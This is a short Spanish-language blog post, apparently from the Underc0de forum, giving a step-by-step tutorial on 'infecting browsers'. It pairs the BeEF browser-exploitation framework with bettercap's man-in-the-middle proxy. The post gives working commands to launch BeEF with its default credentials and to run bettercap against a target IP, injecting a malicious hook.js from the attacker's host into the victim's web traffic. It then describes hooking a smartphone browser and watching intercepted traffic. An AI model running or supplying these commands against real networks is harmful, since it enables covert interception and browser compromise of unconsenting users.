Enter Search Query:

Infectando navegadores con bettercap y BeEF

Infectando navegadores con bettercap y BeEF

¿Que es BeEF?

Básicamente BeEF es un framework diseñado para la explotación de navegadores a través de código JavaScript, el framework tiene una amplia cantidad de opciones post-explotación.

¿Que es Bettercap ?

Bettercap es un framework para ataques MITM (man in the middle) completo y modular que surgió con el objetivo de ser una herramienta más completa y estable que ettercap.


Procedemos a abrir un terminal y lanzar beef con el siguiente comando:

beef-xss

Underc0de - Lanzando beef

Luego de lanzar el comando automáticamente, tendría que abrir una ventana del navegador:

Underc0de - Ventana de Beef

En caso que el navegador no se ejecute, lo abrimos y colocando la siguiente dirección: http://127.0.0.1:3000/ui/panel
Usuario y contraseña por efecto son: user: beef | pass: beef

Underc0de - lanzando beef en el navegador

De momento dejaríamos beef así, pasemos a Bettercap.
Abrimos otra terminal en la que lanzamos bettercap indicando nuestro target (objetivo), el modulo a utilizar y la ruta del JavaScript malicioso proporcionado por beef con el siguiente comando:

bettercap -T 192.168.0.101 --proxy-module injectjs --js-url "http://192.168.0.104:3000/hook.js"

Underc0de - Modulos auxiliares de beef
Tendremos lo siguiente:

Underc0de - beef

Veremos cómo Bettercap inyecta el código JavaScript que indicamos en las peticiones de nuestra objetivo.

Underc0cde - inyectando con beef
Vemos que nuestro objetivo ingresó a la página m.taringa.net desde Android, (en este caso el objetivo es un Smartphone, el ataque es igualmente eficaz en cualquier tipo de dispositivo o S.O), la herramienta automáticamente inyecta el código JavaScript.
Veremos qué pasa por el lado de BeEF:

Underc0de - monitoreando desde bettercap
Procedemos a ver la información que está interceptando.

Underc0de - Monitoreando el trafico con bettercap


Agradecemos a Lonewolf por compartir el artículo.

Para leer completo, hacer clic en el siguiente enlace: BeEF y Bettercap.


Comentarios

Comentarios

27 noviembre, 2017

Posts Relacionados

0 comentarios

Comentarios en: Infectando navegadores con bettercap y BeEF

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *